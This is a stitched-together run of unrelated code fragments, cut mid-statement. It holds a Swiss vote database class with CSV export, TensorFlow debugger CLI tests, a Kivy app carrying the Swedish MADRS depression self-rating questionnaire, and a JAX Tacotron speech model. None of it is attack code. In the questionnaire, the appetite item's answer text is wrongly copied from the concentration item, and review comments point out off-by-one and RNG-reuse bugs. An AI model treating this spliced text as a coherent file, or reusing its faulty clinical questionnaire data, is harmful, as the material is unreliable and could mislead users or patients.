                    query(SwissVote.descriptor_2_level_1),
                    query(SwissVote.descriptor_3_level_1)
                ).all() if x[0]
            ]),
            set([
                x[0] for x in query(SwissVote.descriptor_1_level_2).union(
                    query(SwissVote.descriptor_2_level_2),
                    query(SwissVote.descriptor_3_level_2)
                ).all() if x[0]
            ]),
            set([
                x[0] for x in query(SwissVote.descriptor_1_level_3).union(
                    query(SwissVote.descriptor_2_level_3),
                    query(SwissVote.descriptor_3_level_3)
                ).all() if x[0]
            ]),
        ]

    def update(self, votes):
        """ Adds or updates the given votes.

        Returns the number of added and updated votes as a tuple.

        """
        added = 0
        updated = 0
        query = self.session.query(SwissVote)
        existing = {vote.bfs_number: vote for vote in query}
        mapper = ColumnMapperDataset()
        for vote in votes:
            old = existing.get(vote.bfs_number)
            if old:
                # Copy changed attributes onto the already-persisted vote.
                changed = False
                for attribute, value in mapper.get_items(vote):
                    if mapper.get_value(old, attribute) != value:
                        mapper.set_value(old, attribute, value)
                        changed = True
                if changed:
                    updated += 1
            else:
                added += 1
                self.session.add(vote)
        return added, updated

    def update_metadata(self, metadata):
        """ Adds or updates the campaign material metadata of the votes given
        by BFS number. Returns the number of added and updated entries.

        """
        added = 0
        updated = 0
        for bfs_number, files in metadata.items():
            vote = self.session.query(SwissVote)
            vote = vote.filter_by(bfs_number=bfs_number).first()
            if vote:
                for filename, data in files.items():
                    old = vote.campaign_material_metadata.get(filename)
                    if not old:
                        added += 1
                        vote.campaign_material_metadata[filename] = data
                    elif old != data:
                        updated += 1
                        vote.campaign_material_metadata[filename] = data
        return added, updated

    @property
    def last_modified(self):
        """ Returns the last change of any votes. """

        return self.session.query(func.max(SwissVote.last_change)).scalar()

    def export_csv(self, file):
        """ Exports all votes according to the code book. """

        mapper = ColumnMapperDataset()
        csv = writer(file)
        csv.writerow(mapper.columns.values())
        query = self.query()
        # Export in BFS-number order regardless of the current UI sorting.
        query = query.order_by(None).order_by(SwissVote.bfs_number)
        for vote in query:
            row = []
            for value in mapper.get_values(vote):
                if value is None:
                    # Missing values are exported as '.' per the code book.
                    row.append('.')
                elif isinstance(value, str):
                    row.append(value)
                elif isinstance(value, date):
                    row.append(f'{value:%d.%m.%Y}')
                elif isinstance(value, int):
                    row.append(str(value))
                elif isinstance(value, Decimal):
                    # Decimal comma, trailing zeros stripped.
                    row.append(
                        f'{value:f}'.replace('.', ',').rstrip('0').rstrip(',')
                    )
            csv.writerow(row)

    def export_xlsx(self, file):
        """ Exports all votes according to the code book. """
        # NOTE(review): the implementation of this method continues beyond
        # the visible region of this chunk.
"3"], screen_info={"cols": 80}) self.assertEqual( 2, out.annotations[debugger_cli_common.INIT_SCROLL_POS_KEY]) index = self._findSourceLine(out, self._u_line_number) self.assertEqual( ["L%d u = variables.VariableV1(u_init, name=u_name)" % self._u_line_number, " simple_mul_add/u", " simple_mul_add/u/Assign", " simple_mul_add/u/read"], out.lines[index : index + 4]) self.assertEqual("pt simple_mul_add/u", out.font_attr_segs[index + 1][0][2].content) # simple_mul_add/u/Assign is not used in this run because the Variable has # already been initialized. self.assertEqual(cli_shared.COLOR_BLUE, out.font_attr_segs[index + 2][0][2]) self.assertEqual("pt simple_mul_add/u/read", out.font_attr_segs[index + 3][0][2].content) def testPrintSourceForOpNameSettingMaximumElementCountWorks(self): self._debug_dump.set_python_graph(self._sess.graph) out = self._registry.dispatch_command( "print_source", [self._curr_file_path, "-m", "1"], screen_info={"cols": 80}) index = self._findSourceLine(out, self._u_line_number) self.assertEqual( ["L%d u = variables.VariableV1(u_init, name=u_name)" % self._u_line_number, " simple_mul_add/u", " (... Omitted 2 of 3 op(s) ...) 
+5"], out.lines[index : index + 3]) self.assertEqual("pt simple_mul_add/u", out.font_attr_segs[index + 1][0][2].content) more_elements_command = out.font_attr_segs[index + 2][-1][2].content self.assertStartsWith(more_elements_command, "ps %s " % self._curr_file_path) self.assertIn(" -m 6", more_elements_command) def testListSourceWorks(self): self._debug_dump.set_python_graph(self._sess.graph) out = self._registry.dispatch_command("list_source", []) non_tf_lib_files_start = [ i for i in xrange(len(out.lines)) if out.lines[i].startswith("Source file path")][0] + 1 non_tf_lib_files_end = [ i for i in xrange(len(out.lines)) if out.lines[i].startswith("TensorFlow Python library file(s):")][0] - 1 non_tf_lib_files = [ line.split(" ")[0] for line in out.lines[non_tf_lib_files_start : non_tf_lib_files_end]] self.assertIn(self._curr_file_path, non_tf_lib_files) # Check that the TF library files are marked with special color attribute. for i in xrange(non_tf_lib_files_end + 1, len(out.lines)): if not out.lines[i]: continue for attr_seg in out.font_attr_segs[i]: self.assertTrue(cli_shared.COLOR_GRAY in attr_seg[2] or attr_seg[2] == cli_shared.COLOR_GRAY) def testListSourceWithNodeNameFilterWithMatchesWorks(self): self._debug_dump.set_python_graph(self._sess.graph) out = self._registry.dispatch_command("list_source", ["-n", ".*/read"]) self.assertStartsWith(out.lines[1], "Node name regex filter: \".*/read\"") non_tf_lib_files_start = [ i for i in xrange(len(out.lines)) if out.lines[i].startswith("Source file path")][0] + 1 non_tf_lib_files_end = [ i for i in xrange(len(out.lines)) if out.lines[i].startswith("TensorFlow Python library file(s):")][0] - 1 non_tf_lib_files = [ line.split(" ")[0] for line in out.lines[non_tf_lib_files_start : non_tf_lib_files_end]] self.assertIn(self._curr_file_path, non_tf_lib_files) # Check that the TF library files are marked with special color attribute. 
for i in xrange(non_tf_lib_files_end + 1, len(out.lines)): if not out.lines[i]: continue for attr_seg in out.font_attr_segs[i]: self.assertTrue(cli_shared.COLOR_GRAY in attr_seg[2] or attr_seg[2] == cli_shared.COLOR_GRAY) def testListSourceWithNodeNameFilterWithNoMatchesWorks(self): self._debug_dump.set_python_graph(self._sess.graph) out = self._registry.dispatch_command("list_source", ["-n", "^$"]) self.assertEqual([ "List of source files that created nodes in this run", "Node name regex filter: \"^$\"", "", "[No source file information.]"], out.lines) def testListSourceWithPathAndNodeNameFiltersWorks(self): self._debug_dump.set_python_graph(self._sess.graph) out = self._registry.dispatch_command( "list_source", ["-p", self._curr_file_path, "-n", ".*read"]) self.assertEqual([ "List of source files that created nodes in this run", "File path regex filter: \"%s\"" % self._curr_file_path, "Node name regex filter: \".*read\"", ""], out.lines[:4]) def testListSourceWithCompiledPythonSourceWorks(self): def fake_list_source_files_against_dump(dump, path_regex_allowlist=None, node_name_regex_allowlist=None): del dump, path_regex_allowlist, node_name_regex_allowlist return [("compiled_1.pyc", False, 10, 20, 30, 4), ("compiled_2.pyo", False, 10, 20, 30, 5), ("uncompiled.py", False, 10, 20, 30, 6)] with test.mock.patch.object( source_utils, "list_source_files_against_dump", side_effect=fake_list_source_files_against_dump): out = self._registry.dispatch_command("list_source", []) self.assertStartsWith(out.lines[4], "compiled_1.pyc") self.assertEqual((0, 14, [cli_shared.COLOR_WHITE]), out.font_attr_segs[4][0]) self.assertStartsWith(out.lines[5], "compiled_2.pyo") self.assertEqual((0, 14, [cli_shared.COLOR_WHITE]), out.font_attr_segs[5][0]) self.assertStartsWith(out.lines[6], "uncompiled.py") self.assertEqual(0, out.font_attr_segs[6][0][0]) self.assertEqual(13, out.font_attr_segs[6][0][1]) self.assertEqual(cli_shared.COLOR_WHITE, out.font_attr_segs[6][0][2][0]) 
self.assertEqual("ps uncompiled.py -b 6", out.font_attr_segs[6][0][2][1].content) def testListInputInvolvingNodesWithMultipleOutputs(self): """List an input tree containing tensors from non-:0 output slot.""" with session.Session(config=no_rewrite_session_config()) as sess: x = variables.VariableV1([1, 3, 3, 7], name="x") _, idx = array_ops.unique(x, name="x_unique") idx_times_two = math_ops.multiply(idx, 2, name="idx_times_two") self.evaluate(x.initializer) run_options = config_pb2.RunOptions(output_partition_graphs=True) debug_utils.watch_graph( run_options, sess.graph, debug_ops=["DebugIdentity"], debug_urls="file://%s" % self._dump_root_for_unique) run_metadata = config_pb2.RunMetadata() self.assertAllEqual( [0, 2, 2, 4], sess.run(idx_times_two, options=run_options, run_metadata=run_metadata)) debug_dump = debug_data.DebugDumpDir( self._dump_root_for_unique, partition_graphs=run_metadata.partition_graphs) _, registry = create_analyzer_cli(debug_dump) out = registry.dispatch_command("li", ["idx_times_two"]) self.assertEqual( ["Inputs to node \"idx_times_two\" (Depth limit = 1):", "|- (1) x_unique:1"], out.lines[:2]) class AnalyzerCLIPrintLargeTensorTest(test_util.TensorFlowTestCase): @classmethod def setUpClass(cls): cls._dump_root = tempfile.mkdtemp() with session.Session(config=no_rewrite_session_config()) as sess: # 2400 elements should exceed the default threshold (2000). x = constant_op.constant(np.zeros([300, 8]), name="large_tensors/x") run_options = config_pb2.RunOptions(output_partition_graphs=True) debug_utils.watch_graph( run_options, sess.graph, debug_ops=["DebugIdentity"], debug_urls="file://%s" % cls._dump_root) # Invoke Session.run(). run_metadata = config_pb2.RunMetadata() sess.run(x, options=run_options, run_metadata=run_metadata) cls._debug_dump = debug_data.DebugDumpDir( cls._dump_root, partition_graphs=run_metadata.partition_graphs) # Construct the analyzer and command registry. 
def testPrintLargeTensorWithoutAllOption(self):
  """Without -a/--all, an over-threshold tensor prints with ellipses.

  The fixture tensor has 300 * 8 = 2400 elements, which exceeds the default
  print threshold (2000); truncation shows up as a "...," marker in the
  value printout.
  """
  out = self._registry.dispatch_command(
      "print_tensor", ["large_tensors/x:0"], screen_info={"cols": 80})

  # Assert that ellipses are present in the tensor value printout.
  self.assertIn("...,", out.lines[4])

  # 2100 still exceeds 2000.
  out = self._registry.dispatch_command(
      "print_tensor", ["large_tensors/x:0[:, 0:7]"],
      screen_info={"cols": 80})

  self.assertIn("...,", out.lines[4])
config_pb2.RunOptions(output_partition_graphs=True) debug_utils.watch_graph( run_options, sess.graph, debug_ops=["DebugIdentity"], debug_urls="file://%s" % cls._dump_root) # Invoke Session.run(). run_metadata = config_pb2.RunMetadata() sess.run(z, options=run_options, run_metadata=run_metadata) debug_dump = debug_data.DebugDumpDir( cls._dump_root, partition_graphs=run_metadata.partition_graphs) # Construct the analyzer and command handler registry. _, cls._registry = create_analyzer_cli(debug_dump) @classmethod def tearDownClass(cls): # Tear down temporary dump directory. file_io.delete_recursively(cls._dump_root) def testNodeInfoWithControlDependencies(self): # Call node_info on a node with control inputs. out = self._registry.dispatch_command("node_info", ["control_deps/ctrl_dep_y"]) assert_node_attribute_lines( self, out, "control_deps/ctrl_dep_y", "Identity", self._main_device, [("Add", "control_deps/y")], [("VariableV2", "control_deps/x")], [("Mul", "control_deps/z")], [("Identity", "control_deps/ctrl_dep_z")]) # Call node info on a node with control recipients. out = self._registry.dispatch_command("ni", ["control_deps/x"]) assert_node_attribute_lines(self, out, "control_deps/x", "VariableV2", self._main_device, [], [], [("Identity", "control_deps/x/read")], [("Identity", "control_deps/ctrl_dep_y"), ("Identity", "control_deps/ctrl_dep_z")]) # Verify the menu items (command shortcuts) in the output. 
check_menu_item(self, out, 10, len(out.lines[10]) - len("control_deps/x/read"), len(out.lines[10]), "ni -a -d -t control_deps/x/read") if out.lines[13].endswith("control_deps/ctrl_dep_y"): y_line = 13 z_line = 14 else: y_line = 14 z_line = 13 check_menu_item(self, out, y_line, len(out.lines[y_line]) - len("control_deps/ctrl_dep_y"), len(out.lines[y_line]), "ni -a -d -t control_deps/ctrl_dep_y") check_menu_item(self, out, z_line, len(out.lines[z_line]) - len("control_deps/ctrl_dep_z"), len(out.lines[z_line]), "ni -a -d -t control_deps/ctrl_dep_z") def testListInputsNonRecursiveNoControl(self): """List inputs non-recursively, without any control inputs.""" # Do not include node op types. node_name = "control_deps/z" out = self._registry.dispatch_command("list_inputs", [node_name]) self.assertEqual([ "Inputs to node \"%s\" (Depth limit = 1):" % node_name, "|- (1) control_deps/x/read", "| |- ...", "|- (1) control_deps/ctrl_dep_y", " |- ...", "", "Legend:", " (d): recursion depth = d." ], out.lines) # Include node op types. out = self._registry.dispatch_command("li", ["-t", node_name]) self.assertEqual([ "Inputs to node \"%s\" (Depth limit = 1):" % node_name, "|- (1) [Identity] control_deps/x/read", "| |- ...", "|- (1) [Identity] control_deps/ctrl_dep_y", " |- ...", "", "Legend:", " (d): recursion depth = d.", " [Op]: Input node has op type Op." ], out.lines) check_main_menu( self, out, list_tensors_enabled=True, node_info_node_name=node_name, print_tensor_node_name=node_name, list_outputs_node_name=node_name) # Verify that the node name has bold attribute. self.assertEqual([(16, 16 + len(node_name), "bold")], out.font_attr_segs[0]) # Verify the menu items (command shortcuts) in the output. 
check_menu_item(self, out, 1, len(out.lines[1]) - len("control_deps/x/read"), len(out.lines[1]), "li -c -r control_deps/x/read") check_menu_item(self, out, 3, len(out.lines[3]) - len("control_deps/ctrl_dep_y"), len(out.lines[3]), "li -c -r control_deps/ctrl_dep_y") def testListInputsNonRecursiveNoControlUsingTensorName(self): """List inputs using the name of an output tensor of the node.""" # Do not include node op types. node_name = "control_deps/z" tensor_name = node_name + ":0" out = self._registry.dispatch_command("list_inputs", [tensor_name]) self.assertEqual([ "Inputs to node \"%s\" (Depth limit = 1):" % node_name, "|- (1) control_deps/x/read", "| |- ...", "|- (1) control_deps/ctrl_dep_y", " |- ...", "", "Legend:", " (d): recursion depth = d." ], out.lines) check_main_menu( self, out, list_tensors_enabled=True, node_info_node_name=node_name, print_tensor_node_name=node_name, list_outputs_node_name=node_name) check_menu_item(self, out, 1, len(out.lines[1]) - len("control_deps/x/read"), len(out.lines[1]), "li -c -r control_deps/x/read") check_menu_item(self, out, 3, len(out.lines[3]) - len("control_deps/ctrl_dep_y"), len(out.lines[3]), "li -c -r control_deps/ctrl_dep_y") def testListInputsNonRecursiveWithControls(self): """List inputs non-recursively, with control inputs.""" node_name = "control_deps/ctrl_dep_z" out = self._registry.dispatch_command("li", ["-t", node_name, "-c"]) self.assertEqual([ "Inputs to node \"%s\" (Depth limit = 1, " % node_name + "control inputs included):", "|- (1) [Mul] control_deps/z", "| |- ...", "|- (1) (Ctrl) [Identity] control_deps/ctrl_dep_y", "| |- ...", "|- (1) (Ctrl) [VariableV2] control_deps/x", "", "Legend:", " (d): recursion depth = d.", " (Ctrl): Control input.", " [Op]: Input node has op type Op." 
], out.lines) check_main_menu( self, out, list_tensors_enabled=True, node_info_node_name=node_name, print_tensor_node_name=node_name, list_outputs_node_name=node_name) check_menu_item(self, out, 1, len(out.lines[1]) - len("control_deps/z"), len(out.lines[1]), "li -c -r control_deps/z") check_menu_item(self, out, 3, len(out.lines[3]) - len("control_deps/ctrl_dep_y"), len(out.lines[3]), "li -c -r control_deps/ctrl_dep_y") check_menu_item(self, out, 5, len(out.lines[5]) - len("control_deps/x"), len(out.lines[5]), "li -c -r control_deps/x") def testListInputsRecursiveWithControls(self): """List inputs recursively, with control inputs.""" node_name = "control_deps/ctrl_dep_z" out = self._registry.dispatch_command("li", ["-c", "-r", "-t", node_name]) self.assertEqual([ "Inputs to node \"%s\" (Depth limit = 20, " % node_name + "control inputs included):",
# coding:utf-8 import kivy kivy.require('1.7.2') # replace with your current kivy version ! from kivy.app import App from kivy.uix.screenmanager import ScreenManager, Screen, FadeTransition from kivy.properties import ListProperty, ObjectProperty, StringProperty, NumericProperty from kivy.factory import Factory from kivy.uix.button import Button from kivy.uix.tabbedpanel import TabbedPanel, TabbedPanelItem from kivy.uix.spinner import Spinner from kivy.uix.dropdown import DropDown from kivy.uix.checkbox import CheckBox from kivy.lang import Builder from kivy.uix.popup import Popup from kivy.uix.textinput import TextInput from kivy.uix.boxlayout import BoxLayout from kivy.uix.stacklayout import StackLayout from kivy.uix.label import Label #from kivy.clock import Clock from kivy.uix.progressbar import ProgressBar from kivy.storage.jsonstore import JsonStore from kivy.uix.gridlayout import GridLayout from functools import partial #from kivy.uix.treeview import TreeView, TreeViewNode #from kivy.uix.treeview import TreeViewLabel from kivy.uix.scrollview import ScrollView try: from plyer import sms except: pass #Declaration of global variables: settingdata = JsonStore('settingdata.json') Builder.load_string(''' <MainScreen>: name: 'mainscreen' canvas.before: Color: rgba: 1, 1, 1, 1 Rectangle: pos: self.pos size: self.size GridLayout: row_default_height:root.height / 8 cols:1 orientation: 'vertical' ActionBar: width:root.width height:root.height / 8 background_color:125,125,125,1,1 pos_hint: {'top':1} ActionView: use_separator: True ActionPrevious: app_icon: 'emadrs.png' title: '' with_previous: False ActionGroup: mode: 'spinner' text: 'Meny' #color: 0,0,0,1 ActionButton: text: 'SMS-nr' on_release: root.settings() GridLayout: cols:1 id: megabox BoxLayout: #width:root.width #height:root.height / 8 orientation: 'horizontal' size_hint: None,None size:root.width, .1*root.height id:checkboxes ''') class MainScreen(Screen): nownr=0 qlist=( "Här ber vi dig beskriva din 
sinnesstämning, om du känner dig ledsen, tungsint eller dyster till mods. Tänk efter hur du har känt dig de senaste tre dagarna, om du har skiftat i humöret eller om det har varit i stort sett detsamma hela tiden, och försök särskilt komma ihåg om du har känt dig lättare till sinnes om det har hänt något positivt.", "Här ber vi dig markera i vilken utsträckning du haft känslor av inre spänning, olust och ångest eller odefinierad rädsla under de senaste tre dagarna. Tänk särskilt på hur intensiva känslorna varit, och om de kommit och gått eller funnits hela tiden.", "Här ber vi Dig beskriva hur bra du sover. Tänk efter hur länge du sovit och hur god sömnen varit under de senaste tre nätterna. Bedömningen skall avse hur du faktiskt sovit, oavsett om du tagit sömnmedel eller ej. Om du sover mer än vanligt, sätt din markering vid 0.", "Här ber vi dig ta ställning till hur din aptit är, och tänka efter om den på något sätt skilt sig från vad som är normalt för dig. Om du skulle ha bättre aptit än normalt, markera då det på 0.", "Här ber vi dig ta ställning till din förmåga att hålla tankarna samlade och koncentrera dig på olika aktiviteter. Tänk igenom hur du fungerar vid olika sysslor som kräver olika grad av koncentrationsförmåga, t ex läsning av komplicerad text, lätt tidningstext och TV-tittande.", "Här ber vid dig försöka värdera din handlingskraft. Frågan gäller om du har lätt eller svårt för att komma igång med sådant du tycker du bör göra, och i vilken utsträckning du måste över vinna ett inre motstånd när du skall ta itu med något.", "Här ber vi dig ta ställning till hur du upplever ditt intresse för omvärlden och för andra människor, och för sådana aktiviteter som brukar bereda dig nöje och glädje.", "Frågan gäller hur du ser på din egen framtid och hur du uppfattar ditt eget värde. 
Tänk efter i vilken utsträckning du ger dig självförebråelser, om du plågas av skuldkänslor, och om du oroat dig oftare än vanligt för t ex din ekonomi eller din hälsa.", "Frågan gäller din livslust, och om du känt livsleda. Har du tankar på självmord, och i så fall, i vilken utsträckning upplever du detta som en verklig utväg?" ) dscrptn=( ( "0 Jag kan känna mig glad eller ledsen, allt efter omständigheterna.", "1", "2 Jag känner mig nedstämd för det mesta, men ibland kan det kännas lättare.", "3", "4 Jag känner mig genomgående nedstämd och dyster. Jag kan inte glädja mig åt sådant som vanligen skulle göra mig glad.", "5", "6 Jag är totalt nedstämd och olycklig att jag inte kan tänka mig värre." ), ( "0 Jag känner mig mestadels lugn.", "1", "2 Ibland har jag obehagliga känslor av inre oro.", "3", "4 Jag har ofta en känsla av inre oro som ibland kan bli mycket stark, och som jag måste anstränga mig för att bemästra.", "5", "6 Jag har fruktansvärda, långvariga eller outhärdliga ångestkänslor.", ), ( "0 Jag sover lugnt och bra och tillräckligt länge för mina behov. Jag har inga särskilda svårigheter att somna.", "1", "2 Jag har vissa sömnsvårigheter. Ibland har jag svårt att somna eller sover ytligare eller oroligare än vanligt.", "3", "4 Jag sover minst två timmar mindre per natt än normalt. Jag vaknar ofta under natten, även om jag inte blir störd.", "5", "6 Jag sover mycket dåligt, inte mer än 2-3 timmar per natt." ), ( "0 Min aptit är som den brukar vara.", "1", "2 Min aptit är sämre än vanligt.", "3", "4 Jag har påtagligt svårt att koncentrera mig på sådant som normalt inte kräver någon ansträngning från min sida (t ex läsning eller samtal med andra människor).", "5", "6 Jag kan överhuvudtaget inte koncentrera mig på någonting." 
), ( "0 Jag har inga koncentrationssvårigheter.", "1", "2 Jag har tillfälligt svårt att hålla tankarna samlade på sådant som normalt skulle fånga min uppmärksamhet (t ex läsning eller TV-tittande).", "3", "4 Jag har påtagligt svårt att koncentrera mig på sådant som normalt inte kräver någon ansträngning från min sida (t ex läsning eller samtal med andra människor).", "5", "6 Jag kan överhuvudtaget inte koncentrera mig på någonting." ), ( "0 Jag har inga svårigheter med att ta itu med nya uppgifter.", "1", "2 När jag skall ta itu med något, tar det emot på ett sätt som inte är normalt för mig.", "3", "4 Det krävs en stor ansträngning för mig att ens komma igång med enkla uppgifter som jag vanligtvis utför mer eller mindre rutinmässigt.", "5", "6 Jag kan inte förmå mig att ta itu med de enklaste vardagssysslor." ), ( "0 Jag är intresserad av omvärlden och engagerar mig i den, och det bereder mig både nöje och glädje.", "1", "2 Jag känner mindre starkt för sådant som brukar engagera mig. Jag har svårare än vanligt att bli glad eller svårare att bli arg när det är befogat.", "3", "4 Jag kan inte känna något intresse för omvärlden, inte ens för vänner och bekanta.", "5", "6 Jag har slutat uppleva några känslor. Jag känner mig smärtsamt likgiltig även för mina närmaste." ), ( "0 Jag ser på framtiden med tillförsikt. Jag är på det hela taget ganska nöjd med mig själv.", "1", "2 Ibland klandrar jag mig själv och tycker att jag är mindre värd än andra.", "3", "4 Jag grubblar ofta över mina misslyckanden och känner mig mindervärdig eller dålig, även om andra tycker annorlunda.", "5", "6 Jag ser allting i svart och kan inte se någon ljusning. Det känns som om jag var en alltigenom dålig människa, och som om jag aldrig skulle kunna få någon förlåtelse för det hemska jag gjort." 
def __init__(self, **kwargs):
    """Initialize the screen and build the questionnaire widgets.

    Delegates all widget construction to planupdate(), which is also
    re-invoked after every answer to refresh the UI.
    """
    super(MainScreen, self).__init__(**kwargs)
    self.planupdate()
def radiobox(self, i, j, *args):
    """Record answer value j for question i, then advance to the next
    unanswered question (cyclically) and rebuild the UI.

    self.valuetuple holds the selected value per question; self.bttns holds
    a 0/1 answered flag per question; self.nownr is the currently
    highlighted question index.
    """
    # Tuples are immutable, so copy to lists, mutate, and convert back.
    listV = list(self.valuetuple)
    listV[i] = j
    listB = list(self.bttns)
    listB[i] = 1
    #self.ids.eval("chckbx%set%s"%(str(i),str(j)))
    #myCheckBox1.value = True
    self.valuetuple = tuple(listV)
    self.bttns = tuple(listB)
    # Scan forward from i for the next unanswered question, wrapping at the
    # end; maxloops bounds the scan so a fully-answered form terminates.
    maxloops = 2 * len(self.bttns) - 1
    loops = 0
    number = i
    while self.bttns[number] == 1:
        loops += 1
        if number == len(self.bttns) - 1:
            number = 0
        if loops == maxloops:
            self.nownr = i
            break
        # NOTE(review): after wrapping (number = 0 above) this increment
        # moves straight to index 1, so question 0 is never examined by the
        # scan — looks like an off-by-one; confirm intended behavior.
        number += 1
    # NOTE(review): this runs even after `break`, overwriting the
    # `self.nownr = i` assigned just before breaking — presumably
    # unintended; verify.
    self.nownr = number
    self.planupdate()
biggerbox.add_widget(Label(text='SMS-mottagarens nummer:')) #inpt=TextInput(multiline=False,input_type='number') try: inpt=TextInput(multiline=False,input_type='number',text=settingdata.get('email')['address']) except: inpt=TextInput(multiline=False,input_type='number',text="") biggerbox.add_widget(inpt) store_btn = Button(text='OK') store_btn.bind(on_release=(lambda store_btn: self.change_mail(inpt.text, popup1))) #store_btn.bind(on_press = lambda *args: popup1.dismiss()) box.add_widget(biggerbox) box.add_widget(store_btn) popup1.open() def Submit(self): filled = 1 for i in self.bttns : if i == 0 : filled=0 if filled==0 : box = BoxLayout(orientation='vertical') popup1 = Popup(title='', content=box, size_hint=(.75, .75)) box.add_widget(Label(text='Var god och svara på alla frågor.')) store_btn = Button(text='OK') store_btn.bind(on_press = lambda *args: popup1.dismiss()) box.add_widget(store_btn) popup1.open() else: summa=sum(self.valuetuple) box = BoxLayout(orientation='vertical') popup1 = Popup(title='',
class HighwayBlock(pax.Module):
    """Highway network block.

    Computes ``y = x * (1 - t) + relu(h) * t`` where the transform gate
    ``t`` and candidate ``h`` both come from a single linear projection of
    the input. The gate bias of -1.0 makes the block favor passing ``x``
    through at initialization.
    """

    def __init__(self, dim: int) -> None:
        super().__init__()
        self.dim = dim
        # Single projection producing both the gate and the candidate.
        self.fc = pax.Linear(dim, 2 * dim)

    def __call__(self, x: jnp.ndarray) -> jnp.ndarray:
        projected = self.fc(x)
        gate, candidate = jnp.split(projected, 2, axis=-1)
        gate = jax.nn.sigmoid(gate - 1.0)  # bias toward keeping x
        candidate = jax.nn.relu(candidate)
        return x * (1.0 - gate) + candidate * gate
class PreNet(pax.Module):
    """Two-layer pre-net: (Linear >> relu >> dropout) applied twice.

    When ``always_dropout`` is True, dropout is applied even outside
    training mode. Optional keys ``k1``/``k2`` override the internal RNG
    sequence for the two dropout applications.
    """

    def __init__(self, input_dim, hidden_dim, output_dim, always_dropout=True):
        super().__init__()
        self.fc1 = pax.Linear(input_dim, hidden_dim)
        self.fc2 = pax.Linear(hidden_dim, output_dim)
        self.rng_seq = pax.RngSeq()
        self.always_dropout = always_dropout

    def __call__(self, x, k1=None, k2=None):
        def _layer(h, fc, rng_key):
            # Linear >> relu, then dropout when enabled; draw a fresh key
            # from the module's RNG sequence if none was supplied.
            h = jax.nn.relu(fc(h))
            if self.always_dropout or self.training:
                if rng_key is None:
                    rng_key = self.rng_seq.next_rng_key()
                h = pax.dropout(rng_key, 0.5, h)
            return h

        x = _layer(x, self.fc1, k1)
        return _layer(x, self.fc2, k2)
sigmoid_noise (float): the variance of gaussian noise added to attention scores in training. pad_token (int): the pad value at the end of text sequences. prenet_dim (int): dimension of prenet output. attn_hidden_dim (int): dimension of attention hidden vectors. attn_rnn_dim (int): number of cells in the attention RNN. rnn_dim (int): number of cells in the decoder RNNs. postnet_dim (int): number of features in the postnet convolutions. text_dim (int): dimension of text embedding vectors. """ super().__init__() self.text_dim = text_dim assert rr <= max_rr self.rr = rr self.max_rr = max_rr self.mel_dim = mel_dim self.mel_min = mel_min self.sigmoid_noise = sigmoid_noise self.pad_token = pad_token self.prenet_dim = prenet_dim # encoder submodules self.encoder_embed = pax.Embed(256, text_dim) self.encoder_pre_net = PreNet(text_dim, 256, prenet_dim, always_dropout=True) self.encoder_cbhg = CBHG(prenet_dim) # random key generator self.rng_seq = pax.RngSeq() # pre-net self.decoder_pre_net = PreNet(mel_dim, 256, prenet_dim, always_dropout=True) # decoder submodules self.attn_rnn = pax.LSTM(prenet_dim + prenet_dim * 2, attn_rnn_dim) self.text_key_fc = pax.Linear(prenet_dim * 2, attn_hidden_dim, with_bias=True) self.attn_query_fc = pax.Linear(attn_rnn_dim, attn_hidden_dim, with_bias=False) self.attn_V = pax.Linear(attn_hidden_dim, 1, with_bias=False) self.attn_V_weight_norm = jnp.array(1.0 / jnp.sqrt(attn_hidden_dim)) self.attn_V_bias = jnp.array(attn_bias) self.attn_log = jnp.zeros((1,)) self.decoder_input = pax.Linear(attn_rnn_dim + 2 * prenet_dim, rnn_dim) self.decoder_rnn1 = pax.LSTM(rnn_dim, rnn_dim) self.decoder_rnn2 = pax.LSTM(rnn_dim, rnn_dim) # mel + end-of-sequence token self.output_fc = pax.Linear(rnn_dim, (mel_dim + 1) * max_rr, with_bias=True) # post-net self.post_net = pax.Sequential( conv_block(mel_dim, postnet_dim, 5, jax.nn.tanh, True), conv_block(postnet_dim, postnet_dim, 5, jax.nn.tanh, True), conv_block(postnet_dim, postnet_dim, 5, jax.nn.tanh, True), 
def go_frame(self, batch_size: int) -> jnp.ndarray:
    """Return the <go> start-of-decoding frame.

    A ``(batch_size, mel_dim)`` array uniformly filled with
    ``log(mel_min)``, i.e. the log-mel value of the quietest signal.
    """
    fill_value = jnp.log(self.mel_min)
    return jnp.full((batch_size, self.mel_dim), fill_value)
def zoneout_lstm(self, lstm_core, rng_key, zoneout_pr=0.1):
    """Return a zoneout lstm core.

    It will zoneout the new hidden states and keep the new cell states
    unchanged: with probability ``zoneout_pr`` (per unit) the previous
    hidden value is kept instead of the newly computed one.

    NOTE(review): ``rng_key`` is captured by the closure, so the very same
    zoneout mask key is reused at every timestep when the returned core is
    scanned — confirm this is intended rather than a per-step key split.
    """
    def core(state, x):
        new_state, _ = lstm_core(state, x)
        h_old = state.hidden
        h_new = new_state.hidden
        # mask==True keeps the old hidden unit; cell state passes through.
        mask = jax.random.bernoulli(rng_key, zoneout_pr, h_old.shape)
        h_new = h_old * mask + h_new * (1.0 - mask)
        return pax.LSTMState(h_new, new_state.cell), h_new

    return core
self.encode_text(text) text_key = self.text_key_fc(text) N, L, D = text.shape assert N == 1 mel = self.go_frame(N) @jax.jit def step(attn_state, decoder_rnn_states, rng_key, mel): attn_state, decoder_rnn_states, rng_key, x, _ = self.decoder_step( attn_state, decoder_rnn_states, rng_key, mel, text, text_key, call_pre_net=True, ) x = self.output_fc(x) N, D2 = x.shape x = jnp.reshape(x, (N, self.max_rr, D2 // self.max_rr)) x = x[:, : self.rr, :] x = jnp.reshape(x, (N, self.rr, -1)) mel = x[..., :-1] eos_logit = x[..., -1] eos_pr = jax.nn.sigmoid(eos_logit[0, -1]) rng_key, eos_rng_key = jax.random.split(rng_key) eos = jax.random.bernoulli(eos_rng_key, p=eos_pr) return attn_state, decoder_rnn_states, rng_key, (mel, eos) attn_state, decoder_rnn_states = self.decoder_initial_state(N, L) rng_key = jax.random.PRNGKey(seed) mels = [] count = 0 while True: count = count + 1 attn_state, decoder_rnn_states, rng_key, (mel, eos) = step( attn_state, decoder_rnn_states, rng_key, mel ) mels.append(mel) if eos.item() or count > max_len: break mel = mel[:, -1, :] mels
